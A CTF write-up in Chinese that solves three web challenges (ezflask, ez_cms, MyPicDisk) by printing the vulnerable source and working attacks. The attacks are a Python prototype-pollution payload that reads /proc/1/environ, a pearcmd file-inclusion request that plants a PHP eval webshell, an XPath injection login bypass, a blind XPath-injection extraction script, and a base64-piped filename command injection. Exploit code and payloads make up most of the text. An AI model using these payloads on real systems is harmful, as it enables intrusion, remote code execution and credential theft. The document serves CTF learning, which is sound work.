ezflask

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
import uuid
from flask import Flask, request, session
from secret import black_list
import json
app = Flask(__name__)
app.secret_key = str(uuid.uuid4())
def check(data):
    for i in black_list:
        if i in data:
            return False
    return True
def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)
class user():
    def __init__(self):
        self.username = ""
        self.password = ""
        pass
    def check(self, data):
        if self.username == data['username'] and self.password == data['password']:
            return True
        return False
Users = []
@app.route('/register',methods=['POST'])
def register():
    if request.data:
        try:
            if not check(request.data):
                return "Register Failed"
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Register Failed"
            User = user()
            merge(data, User)
            Users.append(User)
        except Exception:
            return "Register Failed"
        return "Register Success"
    else:
        return "Register Failed"
@app.route('/login',methods=['POST'])
def login():
    if request.data:
        try:
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "Login Failed"
            for user in Users:
                if user.check(data):
                    session["username"] = data["username"]
                    return "Login Success"
        except Exception:
            return "Login Failed"
    return "Login Failed"
@app.route('/',methods=['GET'])
def index():
    return open(__file__, "r").read()
if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5010)

因为没学过python原型链污染,比赛时一直用各种payload加绕过init注册登录成功但是不知道要改__file__,没拿到flag,赛后好好学习了一下python原型链污染

1
2
3
@app.route('/',methods=['GET'])
def index():
    return open(__file__, "r").read()

/路由可以读取文件内容,注册和登录界面没什么作用就是给你污染的,直接污染__file__的值,__init__被过滤了用Unicode编码绕过
1
{"username":"admin","password":"123456","\u005F\u005F\u0069\u006E\u0069\u0074\u005F\u005F":{"__globals__":{"__file__":"../../../proc/1/environ"}}}

这里的/proc/1/environ是读环境变量,这个文件至关重要,==它的内容是正在运行的进程的环境变量列表==

刷新/路由就能看到结果

还有一个大佬直接污染的_static_folder为/进行目录穿越

1
2
3
4
{"__init\u005f_":{"__globals__":{"app":{"_static_folder":"/"}}},  
"username":1,  
"password":1  
}

然后直接访问:
1
/static/proc/1/environ

得到flag

ez_cms

页面底部有指纹信息2015 SEACMS V1.0,网上搜一下相关的漏洞
admin弱口令登录到后台页面(密码123456),可以利用文件包含pearcmd

1
?r=../../../../../../../../../../usr/share/php/pearcmd&+config-create+/<?=eval($_POST[1])?>+../../../../../../../../tmp/1.php

蚁剑:

1
2
3
4
5
http://77339ca5-0e53-4f9d-9b54-5c953f4f3cfb.node4.buuoj.cn/admin/?r=../../../../../../../../tmp/1

这里因为这个cms的文件包含漏洞后面会拼接php后缀就不用加了

密码:1

根目录发现/flag_you_find_ya
1
DASCTF{13e7068b-a748-4240-98cc-655cd53c6b4b}

MyPicDisk

首先是一个登录界面,万能密码就能登

1
username=a' or 1 or '1&password=a

访问/y0u_cant_find_1t.zip得到源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
<?php
session_start();
error_reporting(0);
class FILE{
    public $filename;
    public $lasttime;
    public $size;
    public function __construct($filename){
        if (preg_match("/\//i", $filename)){
            throw new Error("hacker!");
        }
        $num = substr_count($filename, ".");
        if ($num != 1){
            throw new Error("hacker!");
        }
        if (!is_file($filename)){
            throw new Error("???");
        }
        $this->filename = $filename;
        $this->size = filesize($filename);
        $this->lasttime = filemtime($filename);
    }
    public function remove(){
        unlink($this->filename);
    }
    public function show()
    {
        echo "Filename: ". $this->filename. "  Last Modified Time: ".$this->lasttime. "  Filesize: ".$this->size."<br>";
    }
    public function __destruct(){
        system("ls -all ".$this->filename);
    }
}
?>
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>MyPicDisk</title>
</head>
<body>
<?php
if (!isset($_SESSION['user'])){
  echo '
<form method="POST">
    username:<input type="text" name="username"></p>
    password:<input type="password" name="password"></p>
    <input type="submit" value="登录" name="submit"></p>
</form>
';
  $xml = simplexml_load_file('/tmp/secret.xml');
  if($_POST['submit']){
    $username=$_POST['username'];
    $password=md5($_POST['password']);
    $x_query="/accounts/user[username='{$username}' and password='{$password}']";
    $result = $xml->xpath($x_query);
    if(count($result)==0){
      echo '登录失败';
    }else{
      $_SESSION['user'] = $username;
        echo "<script>alert('登录成功!');location.href='/index.php';</script>";
    }
  }
}
else{
    if ($_SESSION['user'] !== 'admin') {
        echo "<script>alert('you are not admin!!!!!');</script>";
        unset($_SESSION['user']);
        echo "<script>location.href='/index.php';</script>";
    }
  echo "<!-- /y0u_cant_find_1t.zip -->";
  if (!$_GET['file']) {
    foreach (scandir(".") as $filename) {
      if (preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
        echo "<a href='index.php/?file=" . $filename . "'>" . $filename . "</a><br>";
      }
    }
    echo '
  <form action="index.php" method="post" enctype="multipart/form-data">
  选择图片:<input type="file" name="file" id="">
  <input type="submit" value="上传"></form>
  ';
    if ($_FILES['file']) {
      $filename = $_FILES['file']['name'];
      if (!preg_match("/.(jpg|jpeg|gif|png|bmp)$/i", $filename)) {
        die("hacker!");
      }
      if (move_uploaded_file($_FILES['file']['tmp_name'], $filename)) {
          echo "<script>alert('图片上传成功!');location.href='/index.php';</script>";
      } else {
        die('failed');
      }
    }
  }
  else{
      $filename = $_GET['file'];
      if ($_GET['todo'] === "md5"){
          echo md5_file($filename);
      }
      else {
          $file = new FILE($filename);
          if ($_GET['todo'] !== "remove" && $_GET['todo'] !== "show") {
              echo "<img src='../" . $filename . "'><br>";
              echo "<a href='../index.php/?file=" . $filename . "&&todo=remove'>remove</a><br>";
              echo "<a href='../index.php/?file=" . $filename . "&&todo=show'>show</a><br>";
          } else if ($_GET['todo'] === "remove") {
              $file->remove();
              echo "<script>alert('图片已删除!');location.href='/index.php';</script>";
          } else if ($_GET['todo'] === "show") {
              $file->show();
          }
      }
  }
}
?>
</body>
</html>

首先的FILE类对上传文件做了点waf:文件名不能出现/,文件名只能有一个小数点,必须是文件
然后我们需要获取admin的密码才可以进行文件上传,这里考的是xxe盲注,
脚本:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import requests  
import time  
url ='http://1faab4d0-7d84-46a1-b6fb-5dc991bc7f72.node4.buuoj.cn:81/index.php'  
  
  
strs ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'  
  
  
flag =''  
for i in range(1,100):  
    for j in strs:  
  
        #猜测根节点名称  
        # payload_1 = {"username":"<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password>".format(i,j),"password":123}  
        #猜测子节点名称  
        # payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])  
  
        #猜测accounts的节点  
        # payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])  
  
        #猜测user节点  
        # payload_4 ="<username>'or substring(name(/root/accounts/user/*[2]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])  
  
        #跑用户名和密码  
        # payload_username ="<username>'or substring(/accounts/user[1]/username/text(), {}, 1)='{}'  or ''='".format(i,j)  
        payload_username ="<username>'or substring(/accounts/user[1]/password/text(), {}, 1)='{}'  or ''='".format(i,j)  
        data={  
            "username":payload_username,  
            "password":123,  
            "submit":"1"  
        }  
        #  
        # payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])  
  
  
        print(payload_username)  
        r = requests.post(url=url,data=data)  
        time.sleep(0.1)  
        # print(r.text)  
#003d7628772d6b57fec5f30ccbc82be1  
  
        if "登录成功" in r.text:  
            flag+=j  
            print(flag)  
            break  
  
    if "登录失败" in r.text:  
        break  
  
print(flag)

结果:003d7628772d6b57fec5f30ccbc82be1
md5解密网站:https://www.somd5.com/
得到密码是:15035371139
然后上传文件,设置好文件名就行不用管内容
1
;echo bHMgLw==|base64 -d|bash;ajpg.jpg

ls /的base64编码是bHMgLw==,访问文件得到adjaskdhnask_flag_is_here_dakjdnmsakjnfksd
接着构造cat /adjaskdhnask_flag_is_here_dakjdnmsakjnfksd
1
;echo Y2F0IC9hZGphc2tkaG5hc2tfZmxhZ19pc19oZXJlX2Rha2pkbm1zYWtqbmZrc2Q=|base64 -d|bash;ajpg.jpg

得到flag
1
DASCTF{1f5da86a-9f0f-4143-ae97-b25a263e7a49}